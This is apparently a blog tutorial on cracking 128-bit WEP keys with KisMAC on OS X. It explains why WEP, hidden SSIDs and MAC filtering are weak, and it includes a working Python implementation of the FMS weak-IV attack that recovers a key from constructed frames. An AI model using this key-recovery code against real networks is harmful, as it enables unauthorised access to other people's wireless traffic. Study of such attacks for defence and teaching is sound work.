How to crack a 128 bit WEP key using OS X and KISMAC

WEP is one of the ways users try to put encryption on their wireless networks. Most students moving into a college dorm for the first time go to the nearest Circuit City or Best Buy, buy the latest wireless router and plug it in. Either they leave it open or they go with the default WEP key. Some tech-savvy users still pick WEP as their wireless encryption protocol simply because their laptops are a couple of years old and the wireless adapters don't support the better protocols, WPA (TKIP) or WPA2 (AES-CCMP).

Even if you use WPA, it doesn't matter whether SSID broadcast is turned on or off: hiding the network name only hides it from casual users, and WPA passphrase cracking keeps getting better as the tools and their dictionaries improve, so the passphrase itself has to be strong. Some help can be had from the good folks at GRC, who offer a free strong-passphrase generation tool. MAC address filtering is an acceptable complement to your wireless protection, but it does not add much security. MAC addresses are never encrypted when sent over the air, since they are the only reliable way for stations to identify each other, so pulling them out of network traffic is trivial and needs only a couple of frames. MAC addresses are also trivial to spoof.

To show you why WEP provides no real security, check out this video from Shawn Hogan, who cracks two 128-bit WEP keys in around 60 seconds using KisMAC, a publicly available tool for the Macintosh. An "ultra-secure" password/MD5 seed would be relatively useless anyway, because the attack does not guess the key: it recovers the RC4 key bytes statistically from the weak IVs in captured traffic, so a strong key only forces the attacker to spend 10 minutes on it instead of 10 seconds (see the linked FAQs), all of which is done from the KisMAC Network menu. It doesn't even matter whether you set your wireless network to be public or hidden, because KisMAC sees it even when the base station isn't broadcasting the SSID. So here goes hacking with KisMAC on OS X.
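The two claims above, that the MAC addresses of a WEP-protected frame travel in the clear and that the key is recovered statistically from weak IVs rather than guessed, can be reproduced offline. The script below is an added example, not code from the original post or from KisMAC: it builds constructed 802.11 WEP-104 ("128-bit") data frames under a constructed 13-byte key and constructed MAC addresses, parses the plaintext header the way any sniffer does, and runs the classic FMS weak-IV attack (the same family of attack KisMAC and aircrack implement) against the first ciphertext byte of each frame, which is known to be 0xAA from the LLC/SNAP header. The key never has to be brute-forced and its entropy never enters into it.

```python
"""Toy WEP-104 frames plus the FMS weak-IV key-recovery attack.
Added example, not code from the original post or from KisMAC; the key,
MAC addresses, payload and capture below are constructed so it runs offline."""
import struct
import zlib

SNAP_HEADER = bytes.fromhex("aaaa030000000800")        # LLC/SNAP: first plaintext byte is always 0xAA
SECRET = bytes.fromhex("0bad1dea5ca1ab1ec0ffee1337")   # 13-byte WEP-104 key (constructed)
AP_MAC = bytes.fromhex("001122334455")                  # constructed BSSID
STA_MAC = bytes.fromhex("66778899aabb")                 # constructed client

def rc4_keystream(key, n):
    """Plain RC4: key-scheduling, then n bytes of output."""
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def wep_frame(secret, iv, payload, seq):
    """802.11 data frame, To-DS + Protected: 24-byte clear header, then
    IV(3) | key-id(1) | RC4_{IV||secret}(SNAP | payload | CRC-32 ICV)."""
    hdr = struct.pack("<HH6s6s6sH", 0x4108, 0, AP_MAC, STA_MAC, AP_MAC, seq << 4)
    plain = SNAP_HEADER + payload
    plain += struct.pack("<I", zlib.crc32(plain))
    ks = rc4_keystream(iv + secret, len(plain))
    return hdr + iv + b"\x00" + bytes(p ^ k for p, k in zip(plain, ks))

def wep_decrypt(secret, frame):
    """Returns SNAP|payload if the ICV verifies under `secret`, else None."""
    body = frame[24:]
    ks = rc4_keystream(body[:3] + secret, len(body) - 4)
    pt = bytes(c ^ k for c, k in zip(body[4:], ks))
    return pt[:-4] if zlib.crc32(pt[:-4]) == struct.unpack("<I", pt[-4:])[0] else None

def parse_header(frame):
    """WEP encrypts only the body: flags, all three MACs, the sequence number,
    the IV and the key-id are readable by anyone in radio range."""
    fc, _dur, a1, a2, a3, sc = struct.unpack_from("<HH6s6s6sH", frame)
    return {"protected": bool(fc & 0x4000), "to_ds": bool(fc & 0x0100),
            "bssid": a1.hex(":"), "src": a2.hex(":"), "dst": a3.hex(":"),
            "seq": sc >> 4, "iv": frame[24:27], "key_id": frame[27] >> 6}

def fms_guess(known, ks0):
    """FMS step for one frame: simulate the first len(known) KSA steps with the
    known RC4-key prefix (IV || recovered secret bytes). If the state is
    'resolved', the first keystream byte ks0 leaks the next key byte with
    probability ~e^-3 (5%); the other guesses are roughly uniform noise."""
    a3 = len(known)
    S, j = list(range(256)), 0
    for i in range(a3):
        j = (j + S[i] + known[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    x = S[1]
    if x >= a3 or ((x + S[x]) & 0xFF) != a3:   # positions 1 and x must survive the rest of the KSA
        return None
    return (S.index(ks0) - j - S[a3]) & 0xFF   # K[a3] = S^-1[out] - j - S[a3]

def fms_recover(frames, key_len=13, budget=3):
    """Recover the secret from captured frames. Votes for key byte A come from
    the weak-IV class (A+3, 0xFF, x); one frame's ICV verifies a full candidate.
    A small search budget (aircrack's 'fudge factor' idea) lets lower-ranked
    candidates be tried when the top vote for some byte is wrong."""
    by_first = {}
    for f in frames:
        by_first.setdefault(f[24], []).append(f)

    def ranked(prefix):
        votes = [0] * 256
        for f in by_first.get(len(prefix) + 3, []):
            g = fms_guess(f[24:27] + prefix, f[28] ^ SNAP_HEADER[0])
            if g is not None:
                votes[g] += 1
        return sorted(range(256), key=lambda b: -votes[b])

    def search(prefix, budget):
        if len(prefix) == key_len:
            return prefix if wep_decrypt(prefix, frames[0]) is not None else None
        for rank, cand in enumerate(ranked(prefix)[:budget + 1]):
            key = search(prefix + bytes([cand]), budget - rank)
            if key is not None:
                return key
        return None

    return search(b"", budget)

def capture_weak_iv_traffic(secret=SECRET, key_len=13):
    """Constructed capture: one frame for every FMS weak IV (A+3, 0xFF, x).
    A real card sees these mixed into ordinary traffic over a longer period."""
    frames = []
    for a in range(key_len):
        for x in range(256):
            frames.append(wep_frame(secret, bytes([a + 3, 0xFF, x]),
                                    b"GET / HTTP/1.0\r\n", len(frames) & 0xFFF))
    return frames

if __name__ == "__main__":
    frames = capture_weak_iv_traffic()
    print(parse_header(frames[0]))                  # MACs, IV, key-id: all plaintext
    key = fms_recover(frames)
    print("recovered", key.hex() if key else None, "ok" if key == SECRET else "failed")
```

With only the 256 weak IVs of each class and nothing else, the plain FMS heuristic lands the right byte in the top few vote positions almost every time, and the ICV check catches the rare miss; real tools collect far more resolved IVs and add the KoreK correlations, which is why a few minutes of traffic suffice. Note what does not appear anywhere in the attack: the passphrase or the MD5 seed it was derived from.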